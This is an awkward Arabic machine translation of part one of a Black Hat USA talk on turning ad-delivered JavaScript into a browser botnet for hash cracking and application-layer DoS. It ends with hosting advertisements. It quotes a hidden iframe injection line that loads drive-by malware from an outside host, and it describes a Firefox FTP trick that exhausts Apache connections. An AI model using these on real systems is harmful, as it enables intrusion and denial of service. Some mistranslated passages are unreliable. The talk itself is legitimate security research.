مؤتمر BLACK HAT USA. بوت نت من مليون متصفح. الجزء الأول

جيريمي غروسمان: يسعدني أن أرحب بكم جميعًا ، وأريد أن أقول إننا كنا نعد هذا العرض التقديمي طوال الأشهر الستة بأكملها ، لذلك نسعى جاهدين لمشاركة إنجازاتنا في أقرب وقت ممكن. أريد أن أشكر جميع موظفي Black Hat على الدعوة ، نعود هنا كل عام ، نحن نحب هذا الحدث. شكرا لك على القبعة السوداء! سنحاول جعل عرض اليوم ممتعًا ، لكننا نريد أولاً أن نقدم أنفسنا.



أنا مؤسس ومدير تطوير المنتجات الجديدة لشركة WhiteHat Security ، الواقعة في سانتا كلارا ، كاليفورنيا. شركتنا لديها حوالي 300 موظف.

مات هو المدير الإداري لمركز أبحاث المخاطر الأمنية. في الأشخاص "ذوي الرؤوس البيضاء" ، نحن منخرطون بشكل رئيسي في اقتحام مواقع الويب ، والعثور على نقاط الضعف فيها ، والقيام بذلك على نطاق واسع. ولكن لا يزال لدينا بعض الوقت للبحث ، لذلك سنبدأ اليوم في اختراق المتصفحات واستخدامها لاختراق المواقع وإظهار الدورة الكاملة لأمان الويب. لقد تحدثت لأول مرة هنا في عام 2002. في معظم الأحيان أقوم بالبحوث في تطوير وعرض منتجاتنا.

مات جوهانسون: لدي خبرة في العمل كمختبر اختراق (pentester) ، وبدأت عملي في الشركة عن طريق اختراق المواقع ، لأنني قبل ذلك كنت أتولى قيادة جيش القراصنة. أقوم ببعض الأبحاث الرائعة وأخذ الكثير من أجل ذلك ، حتى تتمكن من الاتصال بي.



جيريمي غروسمان: إذن ، لنبدأ حفلتنا. لا أعتقد أن هناك شخصًا واحدًا على الأقل لم يتصل بالإنترنت اليوم. ربما أنت الآن غير متصل بالإنترنت ، ولكن عندما تصل إلى المنزل ، سيتفاعل الجميع هنا وكل من تعرفهم باستخدام المتصفح. هذا مجرد جزء من حياتنا اليومية ، وسأشرح لك ما يعنيه ذلك ، ولكن الإنترنت مصمم في المقام الأول للعمل. نحن لا نقوم باختراق الإنترنت ، نحاول استخدامه لأغراضنا الخاصة.

عند زيارة صفحة ويب ، لا يهم أي متصفح تستخدمه - Chrome أو Firefox أو Safari أو IE أو Opera ، على أي حال ، يعمل الإنترنت بطريقة تتحكم بشكل كامل في متصفحك أثناء وجودك في هذه الصفحة أو عندما تبحث عن المتصفح التالي الصفحة.

يمكن أن تتسبب JavaScript أو الفلاش في هذه الصفحة في قيام المتصفح بأي شيء - أي نوع من الاستجابة للطلبات في أي مكان على الإنترنت أو الإنترانت. وهذا يشمل CSRF - الطلبات المزيفة عبر المواقع ، XSS - البرمجة النصية عبر المواقع ، والنقر على النقر والعديد من الحيل الأخرى التي تسمح لك بالتحكم في المتصفح.

الآن سنحاول اكتساب بعض الفهم لما هو أمان المستعرض ، ولكن الفكرة الرئيسية هي الحصول على فكرة عامة عن التحكم في المستعرض دون استخدام ثغرات يوم الصفر ، والتي لا توجد بها تصحيحات.

مات يوهانسون: إذا كنت لا تعرف أي شيء عن XSS ، فيمكنك أن تسألنا عنه.

جيريمي غروسمان: أريد الآن أن أتحدث باختصار عن هجمات المتصفح التي تستخدم HTML أو JavaScript ضار:

  • متصفح متصفح الاستطلاع الاقتراع
  • الطلبات المزيفة عبر المواقع ؛ اكتشاف تسجيل الدخول التعرف على تسجيل الدخول ؛
    اختراق الشبكة الداخلية
    برمجة نصية تلقائية
    دخول البرامج الضارة التقليدية إلى جهاز الكمبيوتر الخاص بالمستخدم عند التنزيل باستخدام طريقة Drive-by-Download ؛
    تجزئة تكسير القوة الغاشمة ؛
    هجمات DDoS على مستوى التطبيق.




    في هذه الشريحة ، ترى نموذجًا لاستجواب المتصفح - إنه جافا سكريبت فقط الذي يبقى في المتصفح عند الانتقال إلى موقع آخر. هذه لقطة شاشة من CNN. عندما تزور موقعهم ، يتم توصيل المقياس بالمتصفح الذي يقوم بإجراء مسح كامل ويتلقى مجموعة كاملة من المعلومات حول العرض الخاص بك: أي متصفح لديك ، وما هو الإصدار ، والمكونات الإضافية المتصلة ، ونظام التشغيل لديك. يفعلون ذلك لأنهم يريدون معرفة من زار موقعهم. في الوقت الحاضر ، هذه تقنية شائعة جدًا.

    بعد ذلك ، ضع في اعتبارك تقنية أكثر تقدمًا - تزوير جافا سكريبت عبر المواقع. لا يتطلب الأمر الكثير من الجهد ، ولا تحتاج إلى تشغيل برنامج نصي ضار ، فقط متصفحك مع جافا سكريبت أو HTML يستخدم لاختراق أي موقع آخر. يستخدم CSRF سجل بحث Google الخاص بك ويفرض على المتصفح الخاص بك تحميل أو تنزيل محتوى غير قانوني ، أو بدء تحويل مصرفي ، إذا قمت بتسجيل الدخول إلى حسابك الشخصي على موقع البنك ، فسوف يجبرك على إرسال رسائل مسيئة أو التصويت لصالح Ed Snowden كشخص العام.

    مات يوهانسون: يمكن لـ CSRF إجبارك ليس فقط على تنزيل أغاني Justin Bieber ، ولكن أيضًا تنزيل الإباحية للأطفال.

    جيريمي غروسمان: لذا ، فإن السطر الأول في الشريحة يجبر متصفحك على حقن محتوى ضار في أي موقع آخر ، أي أنه يمكن أن يجعلك مخترقًا ، والثاني يفرض عليك تنزيل التورنت ويجعلك قرصانًا ينتهك جميع أنواع تراخيص DMCA ، والثالث يرسله إلى نادي المعجبين جوستين بيبر ، الرابع - التصويت على بعض المواقع.



    فيما يلي التعرف على معلومات تسجيل الدخول إلى اكتشاف الدخول - هذا عندما تنتقل إلى الموقع الذي نتحكم فيه. يمكننا معرفة أنك قمت بتسجيل الدخول إلى حسابك على Google و Facebook و Twitter و Linkedin. هناك 6 تقنيات مختلفة لاستخراج بيانات التفويض من متصفحك. ندرس تفضيلاتك ونقوم بهجوم مستهدف على مستخدم معين.



    هجوم آخر هو النقر فوق ، فهو يسمح لك بالكشف عن بياناتك بمجرد النقر على أي صورة أو زر. لنفترض أنك سجلت الدخول إلى Twitter أو Facebook وأعجبت صورة قطة راقصة. تضغط على شيء غير ضار ، ولكن في الواقع تنقر على أحد هذه الأزرار وتكشف عن بياناتك. بنقرة واحدة فقط - ونحن نعرف اسمك وموقعك ونعلم البيانات التي نشرتها على ملفك الشخصي على Twitter أو LinkedIn.



    مات يوهانسون: تشارك بعض الشركات في مثل هذا التتبع ، نظرًا لأن اسمك الكامل يمكن أن يكون ذا قيمة كبيرة لها بالنسبة للإعلانات المستهدفة لسلعها أو خدماتها.

    جيريمي غروسمان: لقد استعرضنا حتى الآن أشياء معروفة ، على الأقل معروفة لجمهور القبعة السوداء. أنت أيضًا على دراية بكسر إنترانت إنترانت عن طريق حقن جافا سكريبت الخبيثة عبر HTTP في جهاز التوجيه DSL الذي يوفر اتصال الشبكة.



    تم اكتشاف هذا لأول مرة في عام 2006 وحتى الآن لم يتم إصلاح هذه الثغرة الأمنية. علاوة على ذلك ، لدينا نوع الهجوم "برمجة نصية تلقائية عبر المواقع" ، عند استخدام iframe ، يتم إجراء حقن برمز XSS ضار ، مما يسمح لك بسرقة ملفات تعريف الارتباط وكلمات المرور المحفوظة وما إلى ذلك. يتم ذلك بشكل رئيسي من خلال بوابة مزود البريد الإلكتروني.



    أخيرًا ، يمكنك تنزيل البرامج الضارة التقليدية باستخدام طريقة Drive-by-Downloads عن طريق حقن السطر التالي:

    <iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe> 

    ونتيجة لذلك ، يتم إرسال متصفحك إلى المواقع المصابة لتنزيل محتوى ضار ، والذي يتحكم بعد ذلك في جهاز الكمبيوتر الخاص بك. هنا ، قد يكون الهدف من الهجوم هو المتصفح نفسه أو ملحقاته ، ويتم استخدام هذه الهجمات بشكل أساسي لإنشاء شبكة بوت نت ، ولتجنب هذا التهديد ، تحتاج إلى تثبيت التصحيحات في الوقت المناسب ، ومن الأفضل إزالة Java تمامًا. باختصار ، هذه هي طرق الهجوم التي سنركز عليها في هذا الحديث.

    مات يوهانسون: تحدث جيريمي عن أشياء سبق ذكرها في مؤتمرات BlackHat السابقة. أود أن أتحدث عن دراسة أخرى ركزت على الحوسبة الموزعة باستخدام جافا سكريبت لاختراق كلمات المرور. هذا شيء رائع ، لأنه يمكنك ببساطة كتابته ويعمل بسرعة كبيرة جدًا. يشير بحث Lavakumar Kuppan إلى أنه باستخدام المقياس الذي اخترعه ، يمكنك بالفعل اختراق أو محاولة كسر مائة ألف تجزئة MD5 في الثانية باستخدام JavaScript إذا كان بإمكانك توزيع JavaScript هذا.

    توضح الشريحة التالية كيف يعمل نظام الحوسبة الموزعة رافان القائم على جافا سكريبت ، والذي يمكنه مهاجمة التجزئة عبر متصفحات متعددة باستخدام هجوم القوة الغاشمة.

    يستخدم HTML5 لتشغيل JavaScript في خلفية WebWorkers ، بما في ذلك العديد من أجهزة الكمبيوتر التي يتم فتح المتصفح عليها في شبكة واحدة لتخمين كلمة المرور. تعثر على كلمة مرور المستخدم التي تتطابق مع تجزئة معينة ، حيث يتم الفرز من 60 إلى 70 ألف كلمة مرور في الثانية ، ويتم استخدام 12 WebWorkers لهذا الغرض.



    هذا أمر سريع جدًا ، سنركز لاحقًا على كيفية توزيعه. بالإضافة إلى هذه المشكلة ، نحن نبحث بجدية في التطبيقات التي تسبب فشل الخدمة (DoS) لعدة أشهر. يمكن للمتصفح إرسال عدد كبير بشكل مدهش من طلبات GET إلى موقع بعيد باستخدام COR من WebWorkers. أثناء البحث ، تم اكتشاف أنه يمكن إرسال حوالي 10000 طلب في الدقيقة من متصفح واحد. في الوقت نفسه ، لا يحتفظ المتصفح بالعديد من اتصالات TCP مفتوحة ، ولكنه يقوم في نفس الوقت بتشغيل العديد من طلبات HTTP. يمكنك استخدام متصفح واحد والعديد من المتصفحات التي تستهدف موقعًا واحدًا. ولكن في أي وقت يمكنك زيادة شدة الهجوم عن طريق زيادة عدد الاتصالات.

    جيريمي غروسمان: سأتحدث عن قيود المتصفح على الاتصالات.



    تعرض أداة تسمى Browserscope عدد الاتصالات التي يمكن أن يدعمها متصفح معين أو إصدار متصفح معين في كل مرة. لا تدعم جميع المتصفحات أكثر من 6 اتصالات باسم مضيف واحد ، ويصل الحد الأقصى لعدد الاتصالات ، على سبيل المثال ، في إصداري IE 8 و 9 إلى 35. لكل متصفح حد لعدد الاتصالات ، ليس للأمان ، ولكن للاستقرار والأداء ، لأنك تذهب إلى الموقع ، أرسل طلبًا ، ويبدأ المتصفح في تنزيل المحتوى.

    لقد تحققنا من هذه المؤشرات ويمكننا القول أن معظم المتصفحات توفر بالفعل العمل مع 6 ، بحد أقصى 7 اتصالات. تعرض الشريحة التالية تشغيل Browserscope ، الذي يختبر أداء المتصفحات المختلفة ، ويخلق العديد من الاتصالات المتزامنة بالخادم. في هذه الحالة ، كان هناك ستة اتصالات مستقرة لـ Firefox.

    ومع ذلك ، تسمح لك بعض المتصفحات بالتحايل على هذا القيد ، وفي اختباراتنا استخدمنا Firefox للتسبب في فشل الخدمة. تعرض الشريحة التالية البرنامج النصي Apache Killer ، الذي ساعد على تجاوز قيود المتصفح ، وإنشاء دفق كامل من الطلبات المتزامنة إلى الخادم وزيادة عدد الاتصالات المفتوحة في وقت واحد من 6 إلى 300.



    تم استخدام بروتوكول HTTP هنا ، ولكن إذا كنت تستخدم FTP عبر المنفذ 80 ، فإن عدد الاتصالات يزداد إلى 400 ، وهذا يمكن أن "يقتل" خادم Apache.

    مات يوهانسون: الاختلاف المهم هنا هو أننا قمنا بذلك باستخدام FTP ، والذي لا يمكنه استخدام بروتوكول HTTP. لذلك ، لم نتمكن من التحقق من العديد من المواضع من أعلى القائمة ولم نتمكن من تنفيذ العديد من تطبيقات المسؤولية الاجتماعية للشركات. هذه ليست سوى الاتصالات التي حاولنا فتحها في نفس الوقت ، لذلك هذا ليس هجوم DoS تقليديًا جدًا ، عندما يحاول مهاجم إطلاق أكبر عدد ممكن من وحدات الميغابت أو الجيجابت في الثانية أو في الساعة قدر الإمكان ، هذا فقط العدد المسموح به من الاتصالات المفتوحة في وقت واحد.

    جيريمي غروسمان: الآن سأقوم بتشغيل خادم Apache على جهاز الكمبيوتر المحمول الخاص بي ، هذه نسخة "فانيليا" بسيطة من Apache 2.4.4 ، حيث يتم تعيين جميع الإعدادات الأساسية بشكل افتراضي ولا يمكن أن يكون لها أي تأثير كبير.



    سنركز على الدورة الأولى ، وسأقوم بتثبيت مجموعة كاملة من طلبات الصور على الخادم هنا ، سترى كيف يتم إرسال الطلبات ، ولا يستجيب الخادم لمدة 3 ثوانٍ ، ثم تبدأ الصور في التحميل على التوالي.

    مات يوهانسون: هذا جانب من جوانب أداء المتصفح ، وليس جانبًا من الأمان. قد نتمكن من إساءة استخدامه على حساب الأمن ، ستراه في بضع دقائق. لكن الهدف من هذا الإجراء هو تنزيل جميع هذه الصور في وقت واحد.

    جيريمي غروسمان: لقد نسيت أن أذكر حالة الخادم ، في الشاشة اليسرى السفلية ، ترى أن الحالة تعرض 7 اتصالات مفتوحة في نفس الوقت ، واحدة لنافذة المتصفح والأخرى لـ 6 صور تم تحميلها. هذا مهم للغاية ، لأننا نحاول الآن كسر الحد الأعلى للاتصالات في هذا المتصفح بالذات. الآن سأقوم بتعيين قيمة الاتصال على 0 لقتل هذه الاتصالات ، وإظهار طريقة لتجاوز القيود في Firefox.

    نقوم ببساطة بتكرار ما يصل إلى 100 اتصال باستخدام FTP لاسم المضيف نفسه. كلهم لا يحتاجون إلى عنوان URL ، لأنه FTP ، ولا يرسل HTTP. انظر في الزاوية السفلية اليسرى - لقد تغيرت حالة الخادم ، تعرض 100 اتصال ، 100 صفحة للعرض. الآن دعنا ننتقل إلى 400 اتصال.

    يتم تحديث الصفحة كل ثانية ، وعندما يصل عدد الاتصالات إلى 270 ، يعاني الخادم من "حالة من الذعر" لا يتوفر لديه الوقت لتقديم المزيد من الطلبات. كل ما نقوم به هو تحميل هذا الكود إلى صفحة الويب ، ويحاول Apache أن يصل عدد الاتصالات المفتوحة المتزامنة إلى 300. ونقوم بكل هذا باستخدام متصفح واحد.

    في الجزء الخلفي من الخلفية ترى تمريرًا آخر ، لدينا نظام آخر على Amazon ، وهذا هو نظام AWS. لا أريد أن أقتلها بهجوم DoS الآن ، لذا عرضت عليك خيار عرض آخر.
    مات جوهانسون: الآن نعرف ما يمكننا القيام به ، على الأقل مع Firefox. هذا ليس اعتداءًا تقليديًا على رفض الخدمة ولا يتم استخدام الروبوتات هنا. لا يزال لدينا عدد قليل من الاحتمالات ، ولكن بشكل عام ، فإن مزايا القرصنة باستخدام طريقة الهجوم هذه هي كما يلي:

    • ليست هناك حاجة لبرامج ضارة ولا مآثر أو هجمات يوم الصفر ؛
    • لا آثار ، لا قلق ؛ حظر التخزين المؤقت للمتصفح ؛
    • افتراضيًا ، يكون أي متصفح عرضة لهذا الهجوم ؛
    • من السهل جدًا تنفيذه ، لقد رأيت بنفسك مدى بساطة الكود ؛
    • كما نقول - إنها تعمل بالطريقة التي يجب أن تعمل بها. من المحتمل أن يكون الإنترنت مصممًا للعمل بهذه الطريقة ، أي أنه يجب التأكد من تنزيل صور متعددة في أسرع وقت ممكن.

    لذلك ، لا أعرف من يمكنه إصلاح هذه المشكلة. دعونا نركز على قضية نشر طريقة الهجوم هذه باستخدام كود JavaScript الخبيث. لن نفكر في الطريقة الكلاسيكية التي يستخدمها بها مرسلو البريد العشوائي ، مثل إرسال رسائل البريد الإلكتروني. خذ بعين الاعتبار التوزيع بواسطة مستخدم عادي ، أي القياس من وجهة نظر المستخدم العادي:

    • استخدام مواقع ذات حركة مرور كبيرة تمتلكها (مدونة ، برامج ، إلخ) ؛
    • إدخال HTML في المواقع والمنتديات الشهيرة وما إلى ذلك.
    • طريقة "الرجل في الوسط" عبر موجه Wi-Fi ؛
    • "تسمم" محركات البحث ؛
    • مواقع القرصنة عن طريق الحقن الجماعي لديدان SQL ؛
    • أدوات الطرف الثالث (الطقس ، العدادات ، أجهزة التتبع ، إلخ).

    قال دوجلاس كروكفورد: "إن الطريقة الأكثر موثوقية والأكثر فعالية من حيث التكلفة لحقن كود ضار هي شراء الإعلانات". لذلك ، سننظر في كيفية عمل شبكات الإعلانات ، لأن هناك الكثير منها على الإنترنت. تعرض الشريحة التالية نظامًا بيئيًا غريبًا للإعلان.



    لذلك ، في الجزء العلوي ، ترى أنه يجب على المعلنين أن يعرضوا لك شيئًا أولاً ، على سبيل المثال ، باقة من الزهور للتاريخ. ينفقون الأموال عليه ، لكنهم بحاجة إلى مواقع من أجل جلب سلعهم إلى المستهلك النهائي. إنهم يريدون أن يبقوا في أيديهم الموزعين بالجملة - ناشري المعلومات مثل المدونات والأخبار والشبكات الاجتماعية والمراجعات والمواقع الشعبية التي يزورها العديد من المستخدمين. هناك جسر بين المعلنين والناشرين يسمى شبكات الإعلانات. ينفقون المال على نشر معلوماتهم على هذه الشبكات ، يمكن أن يكون الصور ، لافتات منبثقة ، جافا سكريبت - أي شيء تريد رؤيته. أنت الأشكال الزرقاء الصغيرة في أسفل الشريحة.

    مات يوهانسون: ذهبنا هذا الصباح إلى موقع TMZ وأخذنا لقطة الشاشة المذهلة هناك.



    ترى الوحدة الإعلانية في أعلى الصفحة وفي أسفل اليمين.

    جيريمي غروسمان: جميع الوحدات الإعلانية التي تراها هي شفرة JavaScript موجودة مباشرةً أمام مستخدمي موقع TMZ وتعمل على جذب انتباههم لكسب بعض المال. هناك عشرات ومئات من هذه الشبكات الإعلانية ، ولكن ضع في اعتبارك أن صورة شعار شركتنا في الزاوية اليمنى العليا من الشريحة ليست شبكة إعلانية! بعض هذه الشبكات تستخدم جافا سكريبت والبعض الآخر لا.

    لذا ، كتبت إلى مالكي شبكة إعلانية واحدة رسالة حول ما أود وضع جافا سكريبت لإعلان طرف ثالث في نظامهم. أجابني أحد الرجال بسرعة كبيرة ، حرفيا في بضع دقائق. كتب أنهم يسمحون فقط بنشر مثل هذا الرمز من الشركات الكبيرة والمعروفة مثل DoubleClick ، ​​التي يثقون بها والتي تقوم بمسح جميع المواد بحثًا عن نقاط الضعف المحتملة. وإذا كنت أعمل مع خوادم إعلانات خارجية كبيرة مثل DFA وما شابه ، فسيجدون الفرصة لاستضافة جافا سكريبت الخاصة بي.



    تتصرف جميع شبكات الإعلانات التقليدية بهذه الطريقة - تدفع لهم المال وتحصل على بعض المقاييس ويضعون إعلانك. هناك نوع آخر من الشبكات التي واجهناها. نحن لا نعطيك أسماءهم عن عمد ، لأننا لا نعرف ما إذا كنا سنقع في مشكلة بسبب هذا.



    تعمل هذه الأنظمة بهذه الطريقة - أنت تدفع القليل من المال لشخص جالس في المنزل أمام الكمبيوتر في المساء لعرض صفحتك من خلال متصفحهم لفترة معينة من الوقت. اتضح أنك تشتري وقت المتصفح مقابل بنس واحد - في هذه الحالة ، يمكن شراء 10 آلاف دقيقة من المشاهدة مقابل 10.5 دولارًا تقريبًا.

    مات جوهانسون: أحد الظروف المهمة هو أن طريقة المشاهدات المدفوعة هذه تستخدم على نطاق واسع لاختراق كلمة المرور. نظرًا لأن المهاجم يحتاج إلى الكثير من الوقت لاختراق كلمة المرور أو تسجيل الدخول باستخدام طريقة القوة الغاشمة ، ولا تضمن شبكات الإعلانات هذه أن متصفحك سيعرض الإعلانات ، ولكنها لن تلتقط شفرة ضارة تبدأ بمجرد تحميل الإعلان على الصفحة. أنت تدفع مقابل ذلك ، ولكن إذا جلس شخص هناك لمدة دقيقة أو 10 دقائق أو ثانيتين ، فلا يوجد ضمان بأنك لن تدفع مقابل حقيقة أنك يمكن أن تستخدم في هجوم DoS.

    جيريمي غروسمان: انتبه إلى السطر الأخير - يمكنك شراء مليون دقيقة من المشاهدة ، وهذا ما يقرب من عامين من وقت المتصفح ، مقابل 650 دولارًا تقريبًا. لذلك هذا مقياس جيد!

    الآن الإنترنت يعمل على الإعلانات ، ويستحق فلسا واحدا. لنعد إلى جدول الأعمال ونركز على النوعين الأخيرين من الهجمات - تكسير تجزئة القوة الغاشمة وهجمات DDoS على مستوى التطبيق. ترى أنه يمكن بسهولة تحجيمها إلى مليون عن طريق المتصفح ، أو ببساطة دفع 650 دولارًا وبدء اختراق كلمة المرور لفترة تعادل عامين. سوف نريكم بعض التظاهرات ، لكن أولاً ، لنتحدث عن الاقتصاد.

    مات يوهانسون: لقد شاهدت لقطة الشاشة هذه الخاصة بشراء دقائق ، ولكن شبكات الإعلانات لها لغتها الخاصة ، والتي لم يكن من السهل علي تعلمها. يطلق المعلنون على هذا "مرات الظهور" ، لكننا نتحدث عن خدمات إعلانية مدفوعة على صفحات محددة. على مدى الأشهر القليلة الماضية ، ظل السعر عند حوالي 50 سنتًا لكل 1000 ظهور ، أو لكل ألف ظهور للإعلان. هناك علامات سعر تكلفة النقرة وتكلفة الألف ظهور.



    لذلك ، عندما أقول "الانطباع" ، يجب أن تتخيل المتصفح كبرنامج روبوت ، كما لو أنك استأجرت شخصًا واحدًا لتحميل إعلاناتك إلى المتصفح والتحكم في هذا المتصفح في الوقت الحالي. لذلك ، يسمونه "انطباع" ، ونحن نسميه "بوت".

    جيريمي غروسمان: لا توجد عقبات تمنع الأشخاص السيئين ، الأشرار الحقيقيين الذين يسرقون بطاقات الائتمان ، من القدرة على استخدام هذه البطاقات المسروقة لشراء دقائق إعلانية أو "انطباعات".

    مات يوهانسون: في لقطة الشاشة التالية ، ترى الإحصائيات الموجودة على شبكة الإعلانات التي استخدمناها في بحثنا.



    لقد شعرنا وكأننا أمام لوحة العدادات ، وننقر على الأزرار ونحاول أن تظهر إعلاناتنا على هذه الشبكة. لم نعرض أي إعلانات ، فقط دمى ، ولم نعرض شفرة جافا سكريبت الخاصة بنا. لقد جربنا أنفسنا كمعلنين وحاولنا أن نكون غير مرئيين للمستخدم ومالكي شبكة الإعلانات قدر الإمكان ، حتى سمحوا لنا ببساطة باستخدام طرق القراصنة السلمية الخاصة بنا ، وندير خوادم الويب الخاصة بنا. خلال الأشهر القليلة من بحثنا ، لم ننفق حتى 10 دولارات.

    يمكنك وضع حدود يومية على جميع أنواع العناصر الإعلانية ، ويمكنك اختيار كلمات رئيسية محددة يجب على المستخدمين التركيز عليها ، واختيار الموقع الجغرافي للجمهور ، أو أنظمة التشغيل أو المتصفحات التي سيعرضها إعلانك ، يمكنك تركيز الإعلانات على أجهزة الجوال أو الأجهزة الثابتة للمستخدمين.

    لقد اخترت للتو أوسع نطاق وصول ممكن للجمهور ، واخترت كلمة "أجهزة كمبيوتر" ككلمة رئيسية. في اليوم الأول ، اشترينا 15 نقرة فقط ، كلفتنا 4 دولارات ، ونتيجة لذلك حصلنا على 8326 "مرة ظهور". تخيل أنه باستخدام هذا الاستثمار المربح ، يمكن تنزيل الرمز الخاص بك إلى 8326 متصفحًا على مدار 24 ساعة!

    مؤتمر BLACK HAT USA. بوت نت من مليون متصفح. الجزء 2


    شكرا لك على البقاء معنا. هل تحب مقالاتنا؟ هل تريد رؤية مواد أكثر إثارة للاهتمام؟ ادعمنا عن طريق تقديم طلب أو التوصية به لأصدقائك ، خصم 30 ٪ لمستخدمي Habr على نظير فريد من خوادم مستوى الدخول التي اخترعناها لك: الحقيقة الكاملة حول VPS (KVM) E5-2650 v4 (6 نوى) 10GB DDR4 240GB SSD 1Gbps من 20 $ أو كيفية تقسيم الخادم؟ (تتوفر الخيارات مع RAID1 و RAID10 ، حتى 24 مركزًا وحتى 40 جيجابايت DDR4).

    VPS (KVM) E5-2650 v4 (6 نوى) 10GB DDR4 240GB SSD 1Gbps حتى ديسمبر مجانًا عند الدفع لمدة ستة أشهر ، يمكنك الطلب هنا .

    ديل R730xd أرخص مرتين؟ فقط لدينا 2 x Intel Dodeca-Core Xeon E5-2650v4 128GB DDR4 6x480GB SSD 1Gbps 100 TV من 249 دولارًا في هولندا والولايات المتحدة! اقرأ عن كيفية بناء مبنى البنية التحتية الطبقة باستخدام خوادم Dell R730xd E5-2650 v4 بتكلفة 9000 يورو مقابل سنت واحد؟

Source: https://habr.com/ru/post/ar426241/


All Articles